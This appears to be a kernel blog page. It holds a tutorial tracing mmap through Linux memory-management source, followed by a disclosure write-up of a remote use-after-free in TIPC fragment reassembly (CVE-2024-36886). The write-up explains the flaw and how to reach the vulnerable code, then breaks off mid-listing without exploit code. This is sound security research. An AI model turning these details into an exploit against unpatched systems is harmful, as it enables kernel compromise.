For those of you unfamiliar with the series (or have understandably forgotten that it existed), I’ve covered several topics relating to kernel memory management previously:

The “Virtual Memory” series of posts discusses the differences between physical and virtual memory, exploring both the user and kernel virtual address spaces
The series on “Memory Allocators” covers the role of memory allocators in general before moving onto to detailing the kernel’s page and slab allocators

This post might be a little different, as I’m writing this introduction before I’ve actually planned 100% what I’ll be writing about. I know I want to explore the memory management (mm) subsystem in more detail, building on what we’ve covered so far, but the issue is…

There’s a LOT to this subsystem, it’s integral to the kernel and interacts with lots of other components. This had me thinking - how do I cover this gargantuan, messy topic in a structured and accessible way?! Where do I begin?? What do I cover???

My plan is to take a leaf out of how I would normally approach researching a new topic like this: start with a high level action (e.g. what the user sees) and follow the source, building up an understanding of the relevant structures and API as we go.

So we’ll take a simple action - mapping and writing to some (anonymous) memory in userspace - and see how deep we can go into the kernel, exploring what is actually going on under the hood. Hopefully this will provide an interesting and informative read, giving some insights on some of the key structures and functions of the kernel’s mm subsystem.

🐧

This post is based on the latest kernel at the time of writing, 6.11.5, and x86_64.

What is Memory Management?
Overview of The MM Subsystem
Getting Lost in The Source
Mapping Memory
Next Time

What is Memory Management?

So before we get stuck into the nitty-gritty details, let’s talk about what we mean by memory management. Fortunately, unlike some of the topics we’ve covered (I’m looking at you SLUB), this one’s fairly self explanatory: it’s about managing a system’s memory.

Memory, in this sense, covers the range of storage a modern system may use: HDDs and SSDs, RAM, CPU registers and caches etc. Managing this involves providing representations of the various types of memory and means for the kernel and userspace to efficiently access and utilise them.

Let’s take the everyday (and oversimplified) example of running a program on our computer. We can see involvement of memory management every step of the way:

First, the program itself is stored on disk and must be read
It is then loaded into RAM, where the physical address in memory is mapped into our process’ virtual address space; commonly loaded data will make use of caches
We’ve talked about how the kernel and userspace have their own virtual address spaces, with their own mappings and protections which need to be managed
Then we have the execution of the code itself which will make use of various CPU registers, it will also need to ask the kernel to do privileged things via system calls, so we also need to consider the transition between userspace and the kernel!

Hopefully this highlights how fundamental the memory management subsystem is and gives a glimpse at its many responsibilities.

Overview of The MM Subsystem

Okay, what does this actually look like? The kernel has several core subsystems, one of which is the memory management subsystem. Looking at the kernel source tree, this is located in the aptly named [mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm) subdirectory.

I figured we could highlight some of the key files in there to give a sense of the subsystems role and structure in a more tangible context. Like many of my decisions, this turned out to be harder than I thought, but we’ll give it a go.

Representing Memory

To be able to manage memory, we need to be able represent it in a way the kernel can work with. There are a number of key structures used by the [mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm) subsystem, many of which can be found in include/linux/mm_types.h. This includes:

Representations for chunks of physically contiguous memory ([struct page](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L72)) and the tables used to organise how this memory is accessed.
The [struct mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) provides a description of a process’ virtual address space, including its different areas of virtual memory ([struct vm_area_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664)).
The [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) also includes a pointer to the upper most table ([pgd_t * pgd](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L806)) which is used to map our process’ virtual addresses to a specific page in physical memory.

Allocating Memory

With our memory represented, we need a way to actually make use of it! The various allocation mechanisms fall under the memory management subsystem, providing ways to manage the pool of available physical memory and allocate it to be used. This includes:

The page allocator ([mm/page_alloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/page_alloc.c)) for allocating physically contiguous memory of at least [PAGE_SIZE](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_types.h#L11).
The slab allocator for the efficient allocation of (physically contiguous) objects, via the [kmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687) API. [mm/slab.h](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab.h) and [mm/slab_common.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab_common.c) define the common API, while the SLUB implementation can be found at [mm/slub.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slub.c).
[mm/vmalloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c) provides an alternative API for allocating virtually contiguous memory and is used for large allocations that may be hard to find physically contiguous space for. E.g. [kvmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L817) will [kmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687) but use [vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144) as a fallback!

Mapping Memory

So far we’ve touched mainly on how to manage physical memory, but as we know there’s a lot more to it than that! Sure, we can map chunks of physical memory into our virtual address space to work on, but what about stuff that sits on disk?

[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) ([mm/mmap.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1521)) is one-stop shop for userspace mappings and allows us to map physical memory into our processes’ virtual address space so we can access it. This can be anonymous memory (i.e. just a chunk of physical memory for us to use) or it can also be used to map a previously opened file into physical memory too!
[mm/filemap.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/filemap.c) contains some core, generic, functionality for managing file mappings, including the use of a page cache for file data. This can then be utilised by file systems when they [read(2)](https://man7.org/linux/man-pages/man2/read.2.html) or [write(2)](https://man7.org/linux/man-pages/man2/write.2.html) files for example.
The [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322) API ( is used for mapping device memory into the kernel virtual address space. An example would be a GPU kernel driver mapping some GPU memory into the kernel virtual address so it can access it. If you recall the post on the kernel virtual address space, you’ll see that the kernel memory map has a specific region for [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322)/[vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144)’d memory! And why do they share memory? Because under the hood [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322) uses the [vmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404) API…
The [vmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404) API allows the kernel to map a set of physical pages to a range of a contiguous virtual addresses (within the vmalloc/ioremap space) space. As we’ve mentioned, this used by both [vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144) and [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322). As a result you can find some functionality for all of them in [mm/vmalloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c).

Managing Memory

We’ve talked a lot about the building blocks for managing memory, but what about actual high level management of memory? Well there’s plenty of that too!

There are a number of syscalls found in [mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm) related to memory management: [mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) and [munmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) for managing mappings, [mprotect(2)](https://man7.org/linux/man-pages/man2/mprotect.2.html) for managing access protections of mappings, [madvise(2)](https://man7.org/linux/man-pages/man2/madvise.2.html) for giving the kernel advise on how to handle mapped pages, [mlock(2)](https://man7.org/linux/man-pages/man2/mlock.2.html) and [munlock(2)](https://man7.org/linux/man-pages/man2/mlock.2.html) to un/lock memory in RAM etc.
We also have other key management functionality such as how to handle when the system runs out of memory ([mm/oom_kill.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/oom_kill.c)) and the memory control groups (memcgs, [mm/memcontrol.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/memcontrol.c)) which provide a way to manage the resources available to specific groups of processes.
[mm/swapfile.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/swapfile.c) allows us to allocate “swap” files. This allows the kernel to use the a portion of disk space (the swap file) as an extension of physical memory. When physical memory availability is low, the kernel will “swap” out inactive/old pages of physical memory to the swap file in order to free up physical memory.

Getting Lost in The Source

Alright, here’s the plan: we will begin our journey with a simple C program that maps some anonymous memory, writes to it and then unmaps it. Sounds easy enough right?

To refresh, “mapping” memory essentially involves pointing some portion of our processes virtual address space to somewhere in physical memory. This could be a file read into physical memory, but we can also map “anonymous” memory. This is just physical memory that has been allocated specifically for this mapping and wasn’t previously tied to a file. But we’ll get into that more shortly, for now, here’s the code:

#include 

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}

So what’s going on here? We map 0x1000 bytes (i.e. a page) of anonymous memory into our virtual address space, pointed to by addr. We then write 8 bytes, 0x4142434445464748, to that address (which points to a page in physical memory). With our work done, we then unmap the anonymous memory and exit.

Okay, now we understand what the program is doing from a user’s perspective - we’re just writing some bytes to some physical memory we allocated. But what’s the kernel actually doing under the hood? The primary API between the userspace and the kernel is system calls, so we can use [strace](https://man7.org/linux/man-pages/man1/strace.1.html) to understand how our little program interacts with the kernel. Perhaps unsurprisingly, it’s not too dissimilar:

> strace ./mm_example
// snip (process setup)
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f487ed24000
munmap(0x7f487ed24000, 4096)            = 0
exit_group(0)
+++ exited with 0 +++

The libc mmap() and munmap() calls are just wrappers around the respective system calls, which we can see here. The only part of the program that doesn’t use system calls is when we write to the memory, but as we’ll soon see, that doesn’t mean the kernel isn’t involved!

Mapping Memory

So let’s start our dive into into the kernel with seeing how memory is mapped.

void *mmap(void addr[.length], size_t length, int prot, int flags,
                  int fd, off_t offset);
int munmap(void addr[.length], size_t length);

[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) is the system call which “creates a new mapping in the virtual address space of the calling process”, for usage information check out the man page.

In our case we’re creating a mapping of 0x1000 bytes, AKA PAGE_SIZE. We want to be able to read and write to it, so have specified the PROT_READ | PROT_WRITE protection flags. As we touched on before, we’re not mapping a file or anything, so we specify MAP_ANONYMOUS - we just want to map a page of unused physical memory.

We also specify MAP_PRIVATE, which in the context of an anonymous mapping means that this mapping won’t be shared with other processes, for example if we fork a child process. More broadly speaking it means “Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.” [1].

Finally, because it’s an anonymous mapping the file descriptor and offset fields are ignored (some implementations require the fd to be -1, so that’s why we set it) as we’re not mapping a file in which we might want to map from a specific offset within.

Entering The Kernel

Okay, so we understand the system call from a userspace perspective, how do we go about understanding how it’s implemented? Well, without going into detail on how system calls work, we can generally find out a system calls “entry point” in the kernel by grepping the source for SYSCALL_DEFINE.*:

SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off & ~PAGE_MASK)
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off >> PAGE_SHIFT);
}

arch/x86/kernel/sys_x86_64.c (v6.11.5)

Check out the macros over in [include/linux/syscalls.h](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/syscalls.h) if you’re curious; this will also explain how to figure out the actual symbol for kernel debugging (spoiler: it’s __x64_sys_ in our case).

That said, [mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) was a terrible example for this little auditing tidbit as there’s actually a lot of results for SYSCALL_DEFINE.*mmap. This is due to architecture specific implementations and legacy versions. If you wanted to be extra sure you can compare the arguments and architecture, or even whip out a debugger and break further in (e.g. on [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255)) [2] and check the back trace:

(gdb) bt
#0  do_mmap (file=file@entry=0x0 , addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, flags=flags@entry=34, 
    pgoff=pgoff@entry=0, populate=0xffffc900004f7d08, uf=0xffffc900004f7d28) at mm/mmap.c:1408
#1  0xffffffff81890ae1 in vm_mmap_pgoff (file=file@entry=0x0 , addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, 
    flag=flag@entry=34, pgoff=pgoff@entry=0) at mm/util.c:551
#2  0xffffffff819139db in ksys_mmap_pgoff (addr=, len=8192, prot=prot@entry=3, flags=34, fd=, 
    pgoff=) at mm/mmap.c:1624
#3  0xffffffff810beff6 in __do_sys_mmap (addr=, len=, prot=3, flags=, fd=, 
    off=) at arch/x86/kernel/sys_x86_64.c:93
#4  __se_sys_mmap (addr=, len=, prot=3, flags=, fd=, off=)
    at arch/x86/kernel/sys_x86_64.c:86
#5  __x64_sys_mmap (regs=0xffffc900004f7f58) at arch/x86/kernel/sys_x86_64.c:86
#6  0xffffffff81008c2e in x64_sys_call (regs=regs@entry=0xffffc900004f7f58, nr=)
    at ./arch/x86/include/generated/asm/syscalls_64.h:10
#7  0xffffffff83be17a6 in do_syscall_x64 (regs=0xffffc900004f7f58, nr=) at arch/x86/entry/common.c:50
#8  do_syscall_64 (regs=0xffffc900004f7f58, nr=) at arch/x86/entry/common.c:80
#9  0xffffffff83e00124 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:119

Backtrace from a 5.15 kernel using GDB

`__x64_sys_mmap()`

SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off & ~PAGE_MASK) // [0]
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off >> PAGE_SHIFT /* [1] */);
}

arch/x86/kernel/sys_x86_64.c (v6.11.5)

Now we have a starting point, let’s start exploring! [__x64_sys_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79) starts off validating the off field, making sure it’s page aligned (i.e. a multiple of PAGE_SIZE) [0] and then shifting it so that [ksys_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476) gets the page offset (instead off the byte offset) [1].

`ksys_mmap_pgoff()`

unsigned long ksys_mmap_pgoff(unsigned long addr, unsigned long len,
			      unsigned long prot, unsigned long flags,
			      unsigned long fd, unsigned long pgoff)
{
	struct file *file = NULL;
	unsigned long retval;

	if (!(flags & MAP_ANONYMOUS)) {
		// SNIP, we have this flag set!
	} else if (flags & MAP_HUGETLB) {
		// SNIP, we don't have this flag set!
	}

	retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff);
out_fput:
	if (file)
		fput(file);
	return retval;
}

mm/mmap.c (v6.11.5)

Well this one’s nice and simple for us anonymous mappers! As there’s no file involved and we’re not using huge pages[3] we cruise on into [vm_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575).

`vm_mmap_pgoff()`

Hopefully we’re warmed up now, as we’ve got a bit more going on here!

unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
	unsigned long ret;
	struct mm_struct *mm = current->mm;          // [0]
	unsigned long populate;
	LIST_HEAD(uf);

	ret = security_mmap_file(file, prot, flag);  // [1]
	if (!ret) {
		if (mmap_write_lock_killable(mm))    // [2]
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &populate,
			      &uf);
		mmap_write_unlock(mm);
		userfaultfd_unmap_complete(mm, &uf);
		if (populate)
			mm_populate(ret, populate);
	}
	return ret;
}

mm/util.c (v6.11.5)

Fetching Our `mm_struct`

First we fetch a reference to an [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) [0], which as we covered earlier, is a key structure that provides a description of a process’ virtual address space.

stolen from some of my old slides

But whose [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) are we grabbing? The kernel maintains a thread (i.e. a kernel stack) for each userspace process. When a userspace process makes a system call, the kernel executes in the “context” of that process, using it’s associated kernel stack.

Along with its own kernel stack, each process has a [task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758) which keeps important data about the process such as its [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779). When the kernel is executing in a processes’ context, it can fetch the [task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758) of the associated userspace process via [current](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52).

[current](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52) is a definition for [get_current()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L44) which returns the [task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758) of the “current” kernel thread, from there we can fetch our [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) from the task’s mm member.

A Bit Of Security

Next up we do some security checks [1], via security_mmap_file(). Generally, if we see a kernel function with the security_ prefix it’s a hook belonging to the kernel’s modular security framework[6].

Looking at the code we’ll notice two definitions[4][5], depending on if [CONFIG_SECURITY](https://cateee.net/lkddb/web-lkddb/SECURITY.html) is enabled. We’ll consider the default case, where it is enabled:

/**
 * security_mmap_file() - Check if mmap'ing a file is allowed
 * @file: file
 * @prot: protection applied by the kernel
 * @flags: flags
 *
 * Check permissions for a mmap operation.  The @file may be NULL, e.g. if
 * mapping anonymous memory.
 *
 * Return: Returns 0 if permission is granted.
 */
int security_mmap_file(struct file *file, unsigned long prot,
		       unsigned long flags)
{
	return call_int_hook(mmap_file, file, prot, mmap_prot(file, prot),
			     flags);
}

/security/security.c (v6.11.5)

If we look for references to mmap_file, we can see these hooks are registered by the [LSM_HOOK_INIT()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/lsm_hooks.h#L114) macro and that different security modules implement their own mmap_file hooks (e.g. capabilities, apparmor, selinux, smack).

Multiple security modules can be active on a system: the capabilities module is always active, along with any number of “minor” modules and up to one “major” module (e.g. apparmor, selinux). We can check which one’s are active via /sys/kernel/security/lsm, the output on my VM is:

$ cat /sys/kernel/security/lsm
lockdown,capability,landlock,yama,apparmor

Of these, the capability and apparmor security modules both define hooks for mmap_file. In this case, both hooks will be run when security_mmap_file() is called.

I hope that was interesting, because in our example neither of these checks actually do anything. Capabilities’ [cap_mmap_file()](https://elixir.bootlin.com/linux/v6.11.5/source/security/commoncap.c#L1436) always returns a success and apparmor’s [apparmor_mmap_file()](https://elixir.bootlin.com/linux/v6.11.5/source/security/apparmor/lsm.c#L582) only does checks if a file is specified.

Locking

Before we delve another call deeper into the mm subsystem, let’s quickly talk about locking. The call to [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255) is protected by the mmap write lock [2]:

unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
// SNIP
		if (mmap_write_lock_killable(mm))
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &populate,
			      &uf);
		mmap_write_unlock(mm);

mm/util.c (v6.11.5)

Locking is extremely important within the kernel and is used to protect shared resources by serialising access or prevent concurrent writes. Insufficient locking can lead to all sorts of undefined behaviour and security issues.

[mmap_write_lock_killable()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117) provides a wrapper for the mm->mmap_lock, which is a R/W semaphore. In laymans term, multiple “readers” can take this lock (i.e. if the calling code is just planning to read the protected resource) or a single writer can [7].

So what does the mmap lock actually protect? That’s a great question and I’m not sure there’s a definitive, detailed “specification” or anything for this (?). More generally though, it protects access to a processes address space. We’ll understand more about what that entails as we delve deeper, but think add/changing/removing mappings as well as other fields within the mm structure too [8].

For the curious, the _killable suffix indicates that the process can be killed while waiting for the lock[9][10]. In which case the function returns an error, which is caught here.

https://man7.org/linux/man-pages/man2/mmap.2.html
If you’re testing this at home, be mindful that other places will call do_mmap(), particularly when running a program
https://docs.kernel.org/admin-guide/mm/hugetlbpage.html
https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053
https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849
https://docs.kernel.org/admin-guide/LSM/index.html
Checkout Linux Inside’s deep dive into semaphores here.
LWN has a good article, “The ongoing search for mmap_lock scalability” (2022), on the importance of the mmap_lock and attempts to scale it
The _killable variant for rw semaphores was actually added in 2016, you can checkout the initial patch series for details
“The Linux Kernel Locking API and Shared Objects” (2021) by Pakt is a nice resource on locking if you want to dive into the topic a bit more

Next Time

Hopefully this isn’t too much of a cliff hanger, but this post has been in my drafts for far too long now and I fear if I don’t post it soon it’ll never get finished 💀.

I went for a bit of a different approach with this topic, due to the scope of the mm subsystem. The aim was to use a simple case study to provide some structure and context to an otherwise complex topic. I also wanted to present an approach and workflow that could perhaps be transferable to researching other parts of the kernel, if that makes sense?

If folks are interested in a part 2, we’ll continue to delve deeper into the mm subsystem, carrying on where we left off with do_mmap(). We’ve barely scratched the surface so far! I’d love to go into more detail on how mappings are represented and managed within the kernel and then move onto paging and who knows what other topics we stumble into.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

ZDI-24-821: A Remote UAF in The Kernel's net/tipc

sam4k — Wed, 03 Jul 2024 13:59:40 +0000

While preparing for my talk at TyphoonCon, about how to find bugs in the Linux kernel, I discovered a neat little vulnerability in the kernel’s TIPC networking stack.

I found this while playing around with syzkaller as part of the research for my talk; I felt like it would only be fair to find some bugs to share if I’m doing a talk about it :)

I picked the TIPC protocol for a few reasons: it had low coverage, net surface is fun, it’s not enabled by default (not out here trying to find critical RCEs for a slide example) plus I have some previous experience working with the protocol.

In this post I’m mainly going to be talking about the vulnerability itself, remediation and maybe I’ll go a little bit into exploitation cos I can’t help myself. If I can find the time, I’d love to do a future post talking more about the discovery process and exploitation.

Overview
- Timeline
Background Stuff
- net/ Basics
  - struct sk_buff
  - struct skb_shared_info
- TIPC Primer
The Vulnerability
Exploitation
Fix + Remediation
Wrapup

Overview

The vulnerability allows a local, or remote attacker, to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel.

Only systems with the TIPC module built (CONFIG_TIPC=y/CONFIG_TIPC=m) and loaded are vulnerable. Additionally, in order to be vulnerable to a remote attack the system must have TIPC configured on an interface reachable by an attacker.

The flaw exists in the implementation of TIPC message fragment reassembly, specifically tipc_buf_append(). The function carries out the reassembly by chaining the fragmented packet buffers together. It takes the first fragment as the head buffer and then processes subsequent fragments sequentially, adding their packet buffers onto the head buffer’s chain.

The vulnerability occurs due to a missing check in the error handling cleanup. On error, the reassembly will bail, freeing both the head buffer (and its chained buffers) and the latest fragment buffer currently being processed. If the latest fragment buffer has already been added to the head buffer’s chain at this point, it will lead to a use-after-free.

The vulnerability was introduced in commit 1149557d64c9 (Mar 2015) and fixed in commit 080cbb890286 (May 2024), affecting kernel versions 4 through to 6.8.

It was assigned ZDI-24-821 and CVE-2024-36886 (shoutout to the insane description formatting on that one).

Timeline

2024-03-23: Case opened with ZDI
2024-04-25: Case reviewed by ZDI
2024-04-25: Case disclosed to the vendor
2024-05-02: Fix published by the vendor
2024-06-20: Coordinated public release of ZDI advisory

Background Stuff

Before we dive into the juicy details, I’m going to cover some background information to provide some additional context to the vulnerability. Feel free to skip this if you’re already familiar with the networking subsystem and TIPC basics!

`net/` Basics

So to kick things off lets try and give a bit of background on some of the networking subsystem fundamentals, as this is where the TIPC protocol is implemented!

I say try, because this subsystem is pretty complex and there’s a lot of ground to cover. But in short, the networking subsystem does what it says on the tin: provides networking capability to the kernel. And it does it in way which is modular and extensible, providing a core API to implement various networking devices, protocols and interfaces.

`struct sk_buff`

One of the fundamental structures that the kernel provides is [struct sk_buff](https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L842) which represents a network packet and its status. The structure is created when a kernel packet is received, either from the user space or from the network interface.[3]

The kernel documentation honestly does a great job unpacking this rather complicated structure, so I’d recommend checking that out (up to the checksum section at least).

Essentially, struct sk_buff itself stores various metadata and the actual packet data is stored in associated buffers. A large part of the complexity surrounding the structure is how these buffers, and the relevant pointers to them, are accessed and manipulated.

`struct skb_shared_info`

One of the features baked into this core API is packet fragmentation, the idea that a protocol’s data may be split across several packets - so we have a situation where some data is fragmented across the data buffers of several struct sk_buffs.

This is where [struct skb_shared_info](https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572) comes in!

/* This data is invariant across clones and lives at
 * the end of the header data, ie. at skb->end.
 */
struct skb_shared_info {
	__u8		flags;
	__u8		meta_len;
	__u8		nr_frags;
	__u8		tx_flags;
	unsigned short	gso_size;
	/* Warning: this field is not always filled in (UFO)! */
	unsigned short	gso_segs;
	struct sk_buff	*frag_list;
	struct skb_shared_hwtstamps hwtstamps;
	unsigned int	gso_type;
	u32		tskey;

	/*
	 * Warning : all fields before dataref are cleared in __alloc_skb()
	 */
	atomic_t	dataref;
	unsigned int	xdp_frags_size;

	/* Intermediate layers must ensure that destructor_arg
	 * remains valid until skb destructor */
	void *		destructor_arg;

	/* must be last field, see pskb_expand_head() */
	skb_frag_t	frags[MAX_SKB_FRAGS];
};

include/linux/skbuff.h (6.7.4)

Among other things, this allows a packet to keep track of its fragments! Relevant to us is frag_list, used to link struct sk_buff headers together for reassembly.

TIPC Primer

Transparent Inter Process Communication (TIPC) is an IPC mechanism designed for intra-cluster communication, originating from Ericsson where it has been used in carrier grade cluster applications for many years. Cluster topology is managed around the concept of nodes and the links between these nodes.

TIPC communications are done over a “bearer”, which is a TIPC abstraction of a network interface. A “media” is a bearer type, of which there are four currently supported: Ethernet, Infiniband, UDP/IPv4 and UDP/IPv6.

A local attacker is able to set up a UDP bearer as an unprivileged user via netlink, as demonstrated by bl@sty during his work on CVE-2021-43267[1]. However, a remote attacker is restricted by whatever bearers are already set up on a system.

TIPC messages have their own header, of which there are several formats outlined in the specification[2]. A common theme is the concept of message “user” which defines their purpose (see “Figure 4: TIPC Message Types”[2]) and can be used to infer the format of the TIPC message.

There is a handshake to establish a link between nodes (see “Link Creation”[2]). An established link is required to reach the vulnerable code. This essentially involves sending three messages to: advertise the node, reset the state and then set the state.

The Vulnerability

🤓

For this example I’m going to be using assuming a local attacker interacting with message fragmentation over a UDP bearer, after establishing a link, on a 6.7.4 kernel.

The TIPC protocol features message fragmentation, where a single TIPC message can be split into fragments and sent to its destination via several packets:

When a message is longer than the identified MTU of the link it will use, it is split up in fragments, each being sent in separate packets to the destination node. Each fragment is wrapped into a packet headed by an TIPC internal header […] The User field of the header is set to MSG_FRAGMENTER, and each fragment is assigned a Fragment Number relative to the first fragment of the message. Each fragmented message is also assigned a Fragmented Message Number, to be present in all fragments. […] At reception the fragments are reassembled so that the original message is recreated, and then delivered upwards to the destination port. [1]

So essentially, each fragment is wrapped up in a TIPC fragment message (a message with the MSG_FRAGMENTER user). Each of these fragment messages will provide metadata in its header, such as the fragment number, so that the fragment within can be reassembled in the right order on the receiving end.

Exploring The Call Trace

Let’s take a look at the kernel call trace for a MSG_FRAGMENTER message being received by a TIPC UDP bearer. This gives us a bit of context about how the TIPC networking stack handles incoming packets:

#0 tipc_link_input+0x41b/0x850 net/tipc/link.c:1339
#1 tipc_link_rcv+0x77a/0x2dc0 net/tipc/link.c:1839
#2 tipc_rcv+0x519/0x3030 net/tipc/node.c:2159
#3 tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
#4 udp_queue_rcv_one_skb+0xe76/0x19b0 net/ipv4/udp.c:2113
#5 udp_queue_rcv_skb+0x136/0xa60 net/ipv4/udp.c:2191

#5 & #4 show the underlying UDP networking stack stuff. #3 is where TIPC first receives inbound TIPC-over-UDP messages, which does some basic bearer level checks before handing the skb over to #2, tipc_rcv().

After bearer level checks, all inbound TIPC packets are processed by #2, tipc_rcv(). This involves sanity checks on TIPC header values and using a combination of message user and link state to figure out how the packet is going to be processed.

A valid MSG_FRAGMENTER message is received by #1, tipc_link_rcv():

int tipc_link_rcv(struct tipc_link *l, struct sk_buff *skb,
          struct sk_buff_head *xmitq)
{
    struct sk_buff_head *defq = &l->deferdq;
    struct tipc_msg *hdr = buf_msg(skb);
    u16 seqno, rcv_nxt, win_lim;
    int released = 0;
    int rc = 0;

    /* Verify and update link state */
    if (unlikely(msg_user(hdr) == LINK_PROTOCOL))
        return tipc_link_proto_rcv(l, skb, xmitq);

    /* Don't send probe at next timeout expiration */
    l->silent_intv_cnt = 0;

    do {
        hdr = buf_msg(skb);
        seqno = msg_seqno(hdr);                                                 [0]
        rcv_nxt = l->rcv_nxt;                                                   [1]
        win_lim = rcv_nxt + TIPC_MAX_LINK_WIN;

        if (unlikely(!link_is_up(l))) {
            if (l->state == LINK_ESTABLISHING)
                rc = TIPC_LINK_UP_EVT;
            kfree_skb(skb);
            break;
        }

        /* Drop if outside receive window */
        if (unlikely(less(seqno, rcv_nxt) || more(seqno, win_lim))) {           [2]
            l->stats.duplicates++;
            kfree_skb(skb);
            break;
        }
        released += tipc_link_advance_transmq(l, l, msg_ack(hdr), 0,
                              NULL, NULL, NULL, NULL);

        /* Defer delivery if sequence gap */
        if (unlikely(seqno != rcv_nxt)) {                                       [3]
            if (!__tipc_skb_queue_sorted(defq, seqno, skb))
                l->stats.duplicates++;
            rc |= tipc_link_build_nack_msg(l, xmitq);
            break;
        }

        /* Deliver packet */
        l->rcv_nxt++;
        l->stats.recv_pkts++;

        if (unlikely(msg_user(hdr) == TUNNEL_PROTOCOL))
            rc |= tipc_link_tnl_rcv(l, skb, l->inputq);
        else if (!tipc_data_input(l, skb, l->inputq))
